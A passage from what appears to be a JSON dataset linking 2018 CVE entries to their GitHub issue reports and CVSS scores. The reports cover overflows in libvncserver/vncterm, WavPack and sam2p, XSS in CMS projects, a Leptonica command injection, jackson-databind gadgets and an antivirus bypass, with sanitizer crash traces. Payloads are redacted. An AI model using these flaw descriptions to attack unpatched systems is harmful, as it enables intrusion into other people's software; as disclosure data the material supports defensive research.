came from PATHTAG so its shortcomings also need to be reported to APITAG upstream. Fix: Some aspects of this issue, most importantly covering prl vzvncserver's APITAG callback, have been addressed with commit NUMBERTAG a NUMBERTAG d NUMBERTAG c NUMBERTAG a2be ERRORTAG dd4b NUMBERTAG bb NUMBERTAG b2c5 on NUMBERTAG Related: FILETAG URLTAG cut APITAG mentioned above appears to be no longer part of libvncserver, hence is not otherwise included in description of this issue.",
  32028. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32029. "severity": "CRITICAL",
  32030. "baseScore": 9.8,
  32031. "impactScore": 5.9,
  32032. "exploitabilityScore": 3.9
  32033. },
  32034. {
  32035. "CVE_ID": "CVE-2018-7226",
  32036. "Issue_Url_old": "https://github.com/LibVNC/vncterm/issues/6",
  32037. "Issue_Url_new": "https://github.com/libvnc/vncterm/issues/6",
  32038. "Repo_new": "libvnc/vncterm",
  32039. "Issue_Created_At": "2018-02-18T21:05:27Z",
  32040. "description": "Security: APITAG APITAG integer overflow and unchecked APITAG While I consider this a security relevant issue, I feel there's no overall benefit from reporting it under an embargo, so here goes. As I reported in URLTAG APITAG APITAG callback API is poorly defined (with int instead of APITAG ) and poorly used by APITAG (without sanitization of the length, and passing in the client specified full length even if fewer bytes were actually read from the client). I also mentioned callback implementation side issues, as illustrated by prl vzvncserver's callback, which was based off vncterm's (hence the report in here) and which has since been fixed in prl vzvncserver. vncterm's implementation of the callback was and still is: CODETAG Besides the conversion to signed int during the call, there's also APITAG in the implementation, which may cause an integer overflow resulting in e.g. APITAG (which succeeds) followed by APITAG (which writes beyond the allocated memory). And there's no check for APITAG possibly returning NULL. I first found the issue during Openwall's security audit of the Virtuozzo NUMBERTAG product, which reuses this code in its prl vzvncserver component. A corresponding Virtuozzo NUMBERTAG fix is: URLTAG We would like to thank the Virtuozzo company for funding the effort. Included below is the relevant excerpt from our Virtuozzo NUMBERTAG report: cut NUMBERTAG PSBM NUMBERTAG prl vzvncserver and APITAG integer overflows, unlimited memory allocations, and unchecked APITAG Severity: medium Thread NUMBERTAG prl vzvncserver\" A particular combination of these NUMBERTAG problems is demonstrated by sending the output of APITAG to prl vzvncserver's TCP port, when prl vzvncserver is running without password. APITAG running with password, authentication would be needed before the specific vulnerable code can be reached, and the string to send would accordingly be longer.) This first causes APITAG to allocate NUMBERTAG APITAG of address space and then to hand out this uninitialized memory to the prl vzvncserver/console.c: APITAG callback, which would attempt to make another similar allocation and make a copy of the data. Unfortunately, this APITAG API, as well as many others, is defined to use \"int\" rather than \"size_t\" for data sizes, and indeed prl vzvncserver uses \"int\" too. For this particular request, this results in a zero byte allocation with APITAG which succeeds, and then in a APITAG of (size_t NUMBERTAG bytes to it. With a range of other similar requests, APITAG may instead be made to fail (for trying to allocate a ridiculous amount of address space, sign extended to NUMBERTAG bit), in which case the APITAG more reliably fails on a NULL pointer dereference. Either way, the service crashes. Finally, it is possible to have the process actually write to (and thus allocate for real) almost NUMBERTAG APITAG of memory with one request, by making the length field just below NUMBERTAG APITAG If no data is sent, then NUMBERTAG APITAG would be written from the uninitialized memory (likely mostly read as zero) to the memory allocated by prl vzvncserver's callback. If the data is actually sent, then first it is written to memory by APITAG and then is copied by the callback, for NUMBERTAG APITAG total. Exploitability of this specific issue into something worse than these varying possibilities is highly doubtful (although exploitation of unlimited size APITAG is not unheard of), but all NUMBERTAG of these issues are prevalent in prl vzvncserver and APITAG code in general, so maybe the impact of another similar issue would more obviously be worse. We recommend that sanity checks be introduced into APITAG so that it doesn't try to allocate unreasonable amounts of memory and pass unsafe sizes to callbacks. We also recommend prl vzvncserver to sanity check its inputs (including received from APITAG and in this way avoid integer overflows and unreasonably large allocations. Finally, it is good practice to check whether a APITAG succeeded before writing to the memory. The function APITAG came from PATHTAG so its shortcomings also need to be reported to APITAG upstream. Fix: Some aspects of this issue, most importantly covering prl vzvncserver's APITAG callback, have been addressed with commit NUMBERTAG a NUMBERTAG d NUMBERTAG c NUMBERTAG a2be ERRORTAG dd4b NUMBERTAG bb NUMBERTAG b2c5 on NUMBERTAG Related: FILETAG URLTAG cut",
  32041. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32042. "severity": "CRITICAL",
  32043. "baseScore": 9.8,
  32044. "impactScore": 5.9,
  32045. "exploitabilityScore": 3.9
  32046. },
  32047. {
  32048. "CVE_ID": "CVE-2018-7251",
  32049. "Issue_Url_old": "https://github.com/anchorcms/anchor-cms/issues/1247",
  32050. "Issue_Url_new": "https://github.com/anchorcms/anchor-cms/issues/1247",
  32051. "Repo_new": "anchorcms/anchor-cms",
  32052. "Issue_Created_At": "2018-02-19T11:21:20Z",
  32053. "description": "Vulnerability . Hey, I just noted that in anchor CMS error logs in APITAG in many a blogs and sites using Anchor are public which may have a high potential impact revealing server paths and other details . The most severe being that of revealing database username and password as in PATHTAG I will be filing a CVE based on this heuristic research that reveals it has a serious vulnerability. Looking forward to your views on the same .. Regards, APITAG Researcher",
  32054. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32055. "severity": "CRITICAL",
  32056. "baseScore": 9.8,
  32057. "impactScore": 5.9,
  32058. "exploitabilityScore": 3.9
  32059. },
  32060. {
  32061. "CVE_ID": "CVE-2018-7253",
  32062. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/28",
  32063. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/28",
  32064. "Repo_new": "dbry/wavpack",
  32065. "Issue_Created_At": "2018-02-04T21:02:20Z",
  32066. "description": "heap buffer overflow while running wavpack. We got another one ( CVETAG heap buffer overflow running wavpack with \" y APITAG option Running 'wavpack y APITAG with the attached file raises heap buffer overflow which may allow a remote attacker to cause unspecified impact including denial of service attack I expected the program to terminate without segfault, but the program crashes as follow ERRORTAG This bug was found with a fuzzer developed by APITAG group at KAIST poc.wav is available at CVETAG",
  32067. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32068. "severity": "HIGH",
  32069. "baseScore": 7.8,
  32070. "impactScore": 5.9,
  32071. "exploitabilityScore": 1.8
  32072. },
  32073. {
  32074. "CVE_ID": "CVE-2018-7254",
  32075. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/26",
  32076. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/26",
  32077. "Repo_new": "dbry/wavpack",
  32078. "Issue_Created_At": "2018-02-03T12:55:58Z",
  32079. "description": "Global buffer overflow while running wavpack. Forwarding a bug report we received in the Debian Bug Tracker ( CVETAG global buffer overflow running wavpack with \" y APITAG option Running 'wavpack y APITAG with the attached file raises global buffer overflow which may allow a remote attacker to cause unspecified impact including denial of service attack I expected the program to terminate without segfault, but the program crashes as follow ERRORTAG poc.wav can be downloaded from CVETAG",
  32080. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32081. "severity": "HIGH",
  32082. "baseScore": 7.8,
  32083. "impactScore": 5.9,
  32084. "exploitabilityScore": 1.8
  32085. },
  32086. {
  32087. "CVE_ID": "CVE-2018-7265",
  32088. "Issue_Url_old": "https://github.com/shish/shimmie2/issues/631",
  32089. "Issue_Url_new": "https://github.com/shish/shimmie2/issues/631",
  32090. "Repo_new": "shish/shimmie2",
  32091. "Issue_Created_At": "2018-02-20T16:33:45Z",
  32092. "description": "Stored XSS vulnerability resulting from improper handling of uploaded SVG files. During testing of your project, I came across a stored XSS vulnerability that stems from lack of sanitizing and checking integrity of SVG files being uploaded to the server Reproduction is quite easy as all it requires is going to the image upload feature, then selecting our crafted svg file then visiting the full image to receive the alert. Svg file code: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  32093. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  32094. "severity": "MEDIUM",
  32095. "baseScore": 6.1,
  32096. "impactScore": 2.7,
  32097. "exploitabilityScore": 2.8
  32098. },
  32099. {
  32100. "CVE_ID": "CVE-2018-7274",
  32101. "Issue_Url_old": "https://github.com/YABhq/Quarx/issues/116",
  32102. "Issue_Url_new": "https://github.com/grafiteinc/cms/issues/116",
  32103. "Repo_new": "grafiteinc/cms",
  32104. "Issue_Created_At": "2018-02-16T10:32:37Z",
  32105. "description": "Multiple Persistent Cross Site Scripting Vulnerabilities. This is with reference to issue NUMBERTAG Description: Quarx CMS is prone to multiple persistent cross site scripting vulnerabilities because it fails to sanitize user supplied input. Affected pages and parameters: Blog > APITAG FAQ > APITAG Pages > APITAG Widgets > APITAG Menus > APITAG Impact: Attacker can execute arbitrary code in the browser of a random user. Affected version NUMBERTAG latest version) and prior PATHTAG Credit: Preethi Koroth Thanks.",
  32106. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  32107. "severity": "MEDIUM",
  32108. "baseScore": 6.1,
  32109. "impactScore": 2.7,
  32110. "exploitabilityScore": 2.8
  32111. },
  32112. {
  32113. "CVE_ID": "CVE-2018-7289",
  32114. "Issue_Url_old": "https://github.com/armadito/armadito-windows-driver/issues/5",
  32115. "Issue_Url_new": "https://github.com/armadito/armadito-windows-driver/issues/5",
  32116. "Repo_new": "armadito/armadito-windows-driver",
  32117. "Issue_Created_At": "2018-02-19T21:19:44Z",
  32118. "description": "Malware with pure UTF NUMBERTAG characters in the filename can bypass detection. Files with names containing pure UTF NUMBERTAG characters can bypass detection. The user mode service will fail to open the file for scanning after the conversion is done to ANSI, because characters that cannot be converted from Unicode are replaced with '?'. URLTAG Below is an image demonstrating the bug. In the first case, the filename is in Arabic and in the second, the filename's first letter is the greek M (U NUMBERTAG C). FILETAG A fix would require a re implementation of the parts of the service dealing with filenames to make them support Unicode.",
  32119. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  32120. "severity": "LOW",
  32121. "baseScore": 3.3,
  32122. "impactScore": 1.4,
  32123. "exploitabilityScore": 1.8
  32124. },
  32125. {
  32126. "CVE_ID": "CVE-2018-7308",
  32127. "Issue_Url_old": "https://github.com/DanWin/hosting/issues/18",
  32128. "Issue_Url_new": "https://github.com/danwin/hosting/issues/18",
  32129. "Repo_new": "danwin/hosting",
  32130. "Issue_Created_At": "2018-02-21T08:32:37Z",
  32131. "description": "CSRF vulnerability in web based Interface. Hey, Just letting you know that this has site wide no CSRF protection . For example on this endpoint FILETAG ,no CSRF tokens are verified when a user does an action",
  32132. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32133. "severity": "HIGH",
  32134. "baseScore": 8.8,
  32135. "impactScore": 5.9,
  32136. "exploitabilityScore": 2.8
  32137. },
  32138. {
  32139. "CVE_ID": "CVE-2018-7408",
  32140. "Issue_Url_old": "https://github.com/npm/npm/issues/19883",
  32141. "Issue_Url_new": "https://github.com/npm/npm/issues/19883",
  32142. "Repo_new": "npm/npm",
  32143. "Issue_Created_At": "2018-02-22T03:41:27Z",
  32144. "description": "Critical Linux filesystem permissions are being changed by latest version. I'm opening this issue because: [ ] npm is crashing. [ ] npm is producing an incorrect install. [X] npm is doing something I don't understand. [X] Other (_see below for feature requests_): What's going wrong? This issue has been happening ever since NUMBERTAG was released a few hours ago. It seems to have completely broken my filesystem permissions and caused me to have to manually fix the permissions of critical files and folders. I believe that it is related to the commit NUMBERTAG e1 which is running chown on the wrong files and folders, sometimes being critical filesystem ones. By using sudo npm on a non root user (root users do not have the same effect), filesystem permissions are being modified. For example, if I run APITAG or APITAG , all commands cause my filesystem to change ownership of directories such as APITAG , APITAG , APITAG , and other critical directories needed for running the system. How can the CLI team reproduce the problem? I am personally using Arch Linux with the latest npm package, installed as root user via: APITAG APITAG APITAG Ensure that your npm is on version NUMBERTAG then, as a non root user, with sudo : APITAG You will find that it fails, sometimes with no warnings and sometimes with an EACCES as it is unable to chown the files in APITAG . No key log files are generated on my system. This was _not_ occurring on my system before the most recent update and using NUMBERTAG resolves the issue so it must be a recent commit. supporting information: APITAG prints NUMBERTAG APITAG prints NUMBERTAG npm config get registry prints: FILETAG Windows, OS APITAG or Linux?: Arch Linux Network issues: Geographic location where npm was run: UK [ ] I use a proxy to connect to the npm registry. [ ] I use a proxy to connect to the web. [ ] I use a proxy when downloading Git repos. [ ] I access the npm registry via a VPN [ ] I don't use a proxy, but have limited or unreliable internet access. Container: [ ] I develop using Vagrant on Windows. [ ] I develop using Vagrant on OS X or Linux. [ ] I develop / deploy using Docker. [ ] I deploy to a APITAG APITAG Heroku). APITAG APITAG",
  32145. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  32146. "severity": "HIGH",
  32147. "baseScore": 7.8,
  32148. "impactScore": 5.9,
  32149. "exploitabilityScore": 1.8
  32150. },
  32151. {
  32152. "CVE_ID": "CVE-2018-7440",
  32153. "Issue_Url_old": "https://github.com/DanBloomberg/leptonica/issues/303",
  32154. "Issue_Url_new": "https://github.com/danbloomberg/leptonica/issues/303",
  32155. "Repo_new": "danbloomberg/leptonica",
  32156. "Issue_Created_At": "2018-02-06T08:09:04Z",
  32157. "description": "APITAG Command Injection Vulnerability. An exploitable command injection vulnerability exists in the APITAG of Leptonica NUMBERTAG A specially crafted gplot rootname argument can cause a command injection resulting in arbitrary code execution. An attacker can provide a malicious path as input to an application that passes attacker data to this function to trigger this vulnerability. For details refer to NUMBERTAG URLTAG",
  32158. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32159. "severity": "CRITICAL",
  32160. "baseScore": 9.8,
  32161. "impactScore": 5.9,
  32162. "exploitabilityScore": 3.9
  32163. },
  32164. {
  32165. "CVE_ID": "CVE-2018-7443",
  32166. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/999",
  32167. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/999",
  32168. "Repo_new": "imagemagick/imagemagick",
  32169. "Issue_Created_At": "2018-02-23T07:40:53Z",
  32170. "description": "Dos: (failed to allocate). Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): tiff Trigger Command: convert ../test.tif /dev/null ASAN OUTPUT PATHTAG convert ../test.tif /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG f NUMBERTAG f NUMBERTAG bytes of APITAG (errno NUMBERTAG APITAG memory map follows NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG c NUMBERTAG c NUMBERTAG c NUMBERTAG e NUMBERTAG e NUMBERTAG e NUMBERTAG e NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f5db NUMBERTAG cb NUMBERTAG f5db4b NUMBERTAG f5db4b NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f5db7bd NUMBERTAG f5db7bd NUMBERTAG f5db7bf NUMBERTAG PATHTAG NUMBERTAG f5db7bf NUMBERTAG f5db7df NUMBERTAG PATHTAG NUMBERTAG f5db7df NUMBERTAG f5db7df NUMBERTAG PATHTAG NUMBERTAG f5db7df NUMBERTAG f5db7df NUMBERTAG PATHTAG NUMBERTAG f5db7df NUMBERTAG f5db7e NUMBERTAG PATHTAG NUMBERTAG f5db7e NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG a NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG c NUMBERTAG f5db NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG b NUMBERTAG f5db NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG c NUMBERTAG f5db NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG d NUMBERTAG f5db NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG d NUMBERTAG f5db8b3c NUMBERTAG PATHTAG NUMBERTAG f5db8b3c NUMBERTAG f5db8b NUMBERTAG PATHTAG NUMBERTAG f5db8b NUMBERTAG f5db8b NUMBERTAG PATHTAG NUMBERTAG f5db8b NUMBERTAG f5db8b NUMBERTAG f5db8b NUMBERTAG f5db8b5e NUMBERTAG PATHTAG NUMBERTAG f5db8b5e NUMBERTAG f5db8d5d NUMBERTAG PATHTAG NUMBERTAG f5db8d5d NUMBERTAG f5db8d5e NUMBERTAG PATHTAG NUMBERTAG f5db8d5e NUMBERTAG f5db8d5f NUMBERTAG PATHTAG NUMBERTAG f5db8d5f NUMBERTAG f5db8d NUMBERTAG f5db8d NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db9be NUMBERTAG PATHTAG NUMBERTAG f5db9be NUMBERTAG f5db9de NUMBERTAG PATHTAG NUMBERTAG f5db9de NUMBERTAG f5db9e NUMBERTAG PATHTAG NUMBERTAG f5db9e NUMBERTAG f5db9f6f NUMBERTAG PATHTAG NUMBERTAG f5db9f6f NUMBERTAG f5db9f NUMBERTAG f5db9f NUMBERTAG f5dba NUMBERTAG PATHTAG NUMBERTAG f5dba NUMBERTAG f5dba NUMBERTAG PATHTAG NUMBERTAG f5dba NUMBERTAG f5dba NUMBERTAG PATHTAG NUMBERTAG f5dba NUMBERTAG f5dba NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f5dba NUMBERTAG a NUMBERTAG f5dbaedf NUMBERTAG f5dbaedf NUMBERTAG f5dbaf NUMBERTAG PATHTAG NUMBERTAG f5dbb NUMBERTAG f5dbb0ed NUMBERTAG f5dbb0ed NUMBERTAG f5dbb NUMBERTAG f5dbb NUMBERTAG f5dbb NUMBERTAG PATHTAG NUMBERTAG f5dbb NUMBERTAG f5dbb NUMBERTAG PATHTAG NUMBERTAG f5dbb NUMBERTAG f5dbb NUMBERTAG fff NUMBERTAG d NUMBERTAG fff NUMBERTAG fa NUMBERTAG FILETAG",
  32171. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32172. "severity": "MEDIUM",
  32173. "baseScore": 6.5,
  32174. "impactScore": 3.6,
  32175. "exploitabilityScore": 2.8
  32176. },
  32177. {
  32178. "CVE_ID": "CVE-2018-7447",
  32179. "Issue_Url_old": "https://github.com/i7MEDIA/mojoportal/issues/82",
  32180. "Issue_Url_new": "https://github.com/i7media/mojoportal/issues/82",
  32181. "Repo_new": "i7media/mojoportal",
  32182. "Issue_Created_At": "2018-02-22T14:46:16Z",
  32183. "description": "Multiple Persistent Cross Site Scripting Vulnerabilities . Description: mojoportal is prone to multiple persistent cross site scripting vulnerabilities because it fails to sanitize user supplied input. The APITAG and APITAG fields of APITAG page are vulnerable. Impact: Attacker can execute arbitrary code in the browser of a random user. Affected version: all PATHTAG Credit: Preethi Koroth Thanks.",
  32184. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  32185. "severity": "MEDIUM",
  32186. "baseScore": 4.8,
  32187. "impactScore": 2.7,
  32188. "exploitabilityScore": 1.7
  32189. },
  32190. {
  32191. "CVE_ID": "CVE-2018-7470",
  32192. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/998",
  32193. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/998",
  32194. "Repo_new": "imagemagick/imagemagick",
  32195. "Issue_Created_At": "2018-02-23T05:36:01Z",
  32196. "description": "Wrong pointer access. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Modules APITAG Delegates (built in): bzlib cairo djvu fftw flif fontconfig fpx freetype jbig jng jp2 jpeg lcms ltdl openexr pangocairo png raw rsvg tiff webp wmf x xml zlib ASAN OUTPUT APITAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG server i NUMBERTAG Additional information: Found by: Wang Yan APITAG",
  32197. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32198. "severity": "MEDIUM",
  32199. "baseScore": 6.5,
  32200. "impactScore": 3.6,
  32201. "exploitabilityScore": 2.8
  32202. },
  32203. {
  32204. "CVE_ID": "CVE-2018-7487",
  32205. "Issue_Url_old": "https://github.com/pts/sam2p/issues/18",
  32206. "Issue_Url_new": "https://github.com/pts/sam2p/issues/18",
  32207. "Repo_new": "pts/sam2p",
  32208. "Issue_Created_At": "2018-02-12T09:27:09Z",
  32209. "description": "It is a heap buffer overflow in APITAG APITAG Hi, i found a heap buffer overflow bug in the sam2p NUMBERTAG the details are below(ASAN): > ./sam2p NUMBERTAG APITAG heapover EPS: /dev/null > This is sam2p NUMBERTAG Available Loaders: PS PDF JAI PNG JPEG TIFF PNM BMP GIF LBM XPM PCX TGA. > Available Appliers: XWD Meta Empty BMP PNG TIFF6 TIFF6 JAI JPEG JAI JPEG PNM GIF NUMBERTAG a+LZW XPM PSL1C PSL NUMBERTAG PDF PSL2+PDF JAI P APITAG > sam2p: Warning: PCX: PCX file appears to be truncated. > sam2p: Warning: PCX: Error reading PCX colormap. Using grayscale NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG ae9e at pc NUMBERTAG f6 bp NUMBERTAG fffffffd6d0 sp NUMBERTAG fffffffd6c0 > WRITE of size NUMBERTAG at NUMBERTAG b NUMBERTAG ae9e thread T NUMBERTAG f5 in APITAG PATHTAG NUMBERTAG f5 in in_pcx_reader PATHTAG NUMBERTAG in APITAG , APITAG const&, char const ) PATHTAG NUMBERTAG a in APITAG Files::FILEW&, char const const , bool) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG ffff6ac NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG ae9e is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG > allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG df2a in emulate_cc_new PATHTAG NUMBERTAG df2a in operator APITAG long) PATHTAG > > SUMMARY: APITAG heap buffer overflow PATHTAG APITAG > Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e NUMBERTAG fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa > Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): > Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa > Heap right redzone: fb > Freed heap region: fd > Stack left redzone: f1 > Stack mid redzone: f2 > Stack right redzone: f3 > Stack partial redzone: f4 > Stack after return: f5 > Stack use after scope: f8 > Global redzone: f9 > Global init order: f6 > Poisoned by user: f7 > Container overflow: fc > Array cookie: ac > Intra object redzone: bb > APITAG internal: fe NUMBERTAG ABORTING POC FILE: URLTAG",
  32210. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32211. "severity": "HIGH",
  32212. "baseScore": 7.8,
  32213. "impactScore": 5.9,
  32214. "exploitabilityScore": 1.8
  32215. },
  32216. {
  32217. "CVE_ID": "CVE-2018-7489",
  32218. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1931",
  32219. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1931",
  32220. "Repo_new": "fasterxml/jackson-databind",
  32221. "Issue_Created_At": "2018-02-11T02:03:28Z",
  32222. "description": "Two c3p0 gadgets to exploit default typing issue. (note: placeholder until versions are released) From an email report there are NUMBERTAG other c3p0 classes (above and beyond ones listed in NUMBERTAG need to be blocked.",
  32223. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32224. "severity": "CRITICAL",
  32225. "baseScore": 9.8,
  32226. "impactScore": 5.9,
  32227. "exploitabilityScore": 3.9
  32228. },
  32229. {
  32230. "CVE_ID": "CVE-2018-7551",
  32231. "Issue_Url_old": "https://github.com/pts/sam2p/issues/28",
  32232. "Issue_Url_new": "https://github.com/pts/sam2p/issues/28",
  32233. "Repo_new": "pts/sam2p",
  32234. "Issue_Created_At": "2018-02-23T02:39:01Z",
  32235. "description": "invalid free in APITAG (in APITAG There is an invalid free in APITAG that leads to a Segmentation fault at sam2p NUMBERTAG A crafted input will lead to denial of service attack. Steps to Reproduce: ERRORTAG POC FILE: URLTAG",
  32236. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32237. "severity": "CRITICAL",
  32238. "baseScore": 9.8,
  32239. "impactScore": 5.9,
  32240. "exploitabilityScore": 3.9
  32241. },
  32242. {
  32243. "CVE_ID": "CVE-2018-7552",
  32244. "Issue_Url_old": "https://github.com/pts/sam2p/issues/30",
  32245. "Issue_Url_new": "https://github.com/pts/sam2p/issues/30",
  32246. "Repo_new": "pts/sam2p",
  32247. "Issue_Created_At": "2018-02-23T02:47:45Z",
  32248. "description": "invalid free in APITAG (in APITAG There is an invalid free in APITAG that leads to a Segmentation fault at sam2p NUMBERTAG A crafted input will lead to denial of service attack. Steps to Reproduce: ERRORTAG POC FILE: URLTAG",
  32249. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32250. "severity": "CRITICAL",
  32251. "baseScore": 9.8,
  32252. "impactScore": 5.9,
  32253. "exploitabilityScore": 3.9
  32254. },
  32255. {
  32256. "CVE_ID": "CVE-2018-7553",
  32257. "Issue_Url_old": "https://github.com/pts/sam2p/issues/32",
  32258. "Issue_Url_new": "https://github.com/pts/sam2p/issues/32",
  32259. "Repo_new": "pts/sam2p",
  32260. "Issue_Created_At": "2018-02-23T07:22:41Z",
  32261. "description": "It is a heap buffer overflow vulnerability in APITAG APITAG . Hi, i found a heap buffer overflow vulnerability in the sam2p NUMBERTAG reason: URLTAG URLTAG The crash happened in the APITAG function of the file in_pcx.cpp in line NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32262. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32263. "severity": "CRITICAL",
  32264. "baseScore": 9.8,
  32265. "impactScore": 5.9,
  32266. "exploitabilityScore": 3.9
  32267. },
  32268. {
  32269. "CVE_ID": "CVE-2018-7554",
  32270. "Issue_Url_old": "https://github.com/pts/sam2p/issues/29",
  32271. "Issue_Url_new": "https://github.com/pts/sam2p/issues/29",
  32272. "Repo_new": "pts/sam2p",
  32273. "Issue_Created_At": "2018-02-23T02:44:40Z",
